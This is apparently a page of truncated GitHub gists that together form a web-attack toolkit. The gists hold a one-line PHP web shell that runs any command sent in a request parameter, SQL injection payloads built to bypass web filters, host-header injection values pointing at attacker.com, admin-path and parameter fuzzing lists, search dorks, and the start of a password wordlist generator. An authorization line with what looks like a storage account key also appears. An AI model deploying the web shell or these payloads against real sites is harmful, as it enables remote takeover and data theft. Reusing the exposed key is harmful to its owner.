This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Headers :- | |
x-forwarded-scheme: http (13) | |
X-Forwarded-Port: 123 | |
x-forwarded-host: attacker.com | |
\:1 (13) | |
Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08= | |
x-forwarded-Proto: http (4) | |
x-http-method-override: HEAD (3) | |
x-amz-website-redirect-location (3) | |
X-host: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system($_REQUEST['cmd']); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
site: | |
site: | |
site:No | |
site:Nama | |
site:ac | |
site:ad | |
site:ae | |
site:af | |
site:ag | |
site:ai |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
?a=11&t= | |
?a=114&t= | |
?a=155&t= | |
?a=33&t= | |
?a=34&t= | |
?a=9&t= | |
?a=latest&t= | |
?aa= | |
?abre= | |
?abrir= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
+union%0Aselect+ | |
+union+distinctROW+select+ | |
/*!12345UNION+SELECT*/ | |
/**//*!50000UNION+SELECT*//**/ | |
/**/UNION/**//*!50000SELECT*//**/ | |
/*!50000UniON+SeLeCt*/ | |
union+/*!50000%53elect*/ | |
+‪#union+‪#select | |
+‪#1q%0AuNiOn+all#qa%0A#%0AsEleCt | |
/*!%55NiOn*/+/*!%53eLEct*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
admin/ | |
administrator/ | |
admin1/ | |
admin2/ | |
admin3/ | |
admin4/ | |
admin5/ | |
usuarios/ | |
usuario/ | |
moderator/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
x-forwarded-scheme | |
x-forwarded-host | |
\ | |
Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08= | |
x-forwarded-Proto | |
x-http-method-override | |
x-amz-website-redirect-location | |
X-host | |
X-Forwarded-Host | |
X-Forwarded-Server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://stragwxnwe01.ah.nl/ | |
https://golden.com/home | |
inurl /bug bounty | |
inurl : / security | |
inurl:security.txt | |
inurl:security "reward" | |
inurl : /responsible disclosure | |
inurl : /responsible-disclosure/ reward | |
inurl : / responsible-disclosure/ swag | |
inurl : / responsible-disclosure/ bounty |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import itertools | |
import random | |
special_chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~" | |
words = ["example", "password", "security", "test", "random"] | |
years = [str(year) for year in range(2000, 2031)] | |
with open("wordlist.txt", "w") as f: | |
for _ in range(1000): # Change 1000 to however many combinations you want | |
specials = ''.join(random.choices(special_chars, k=4)) |